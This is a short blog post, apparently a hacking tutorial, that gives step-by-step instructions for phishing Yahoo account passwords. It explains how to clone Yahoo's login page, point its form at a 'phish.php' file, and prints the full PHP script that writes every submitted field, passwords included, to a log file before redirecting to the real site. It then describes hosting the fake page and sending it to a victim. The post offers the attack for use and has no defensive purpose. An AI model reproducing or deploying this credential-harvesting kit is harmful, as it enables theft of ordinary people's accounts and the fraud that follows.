How to hack yahoo acount easily:
So guys now i will show you how to hack yahoo account using phishing method and this is a very easy way to hack anything
So lets get started
First go to the Yahoo.com login page.
Then right click on the page and then click on view source
Then copy all the codes and paste it in notepad.
Then open notepad and search for:
action="https://login.yahoo.com/config/login?"
Once located change action string by phish.php, so that above string should appear as following,
action="phish.php"
Now step number two is to create phish.php file. Open notepad and copy following code in it,
<?php
header ('Location: https://login.yahoo.com/config/login_verify2?&.src=ym ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it as phish.php, now create an empty password log file log.txt. Now sign up for a free webhosting service which supports php from my3gb.com Now upload Yahoomail.htm file, php file, password log file and Yahoomail_files folder to that web host. Change permission of log.txt file to777 from settings. Now vector this phished site to victim to get his/her password.

No comments :
Post a Comment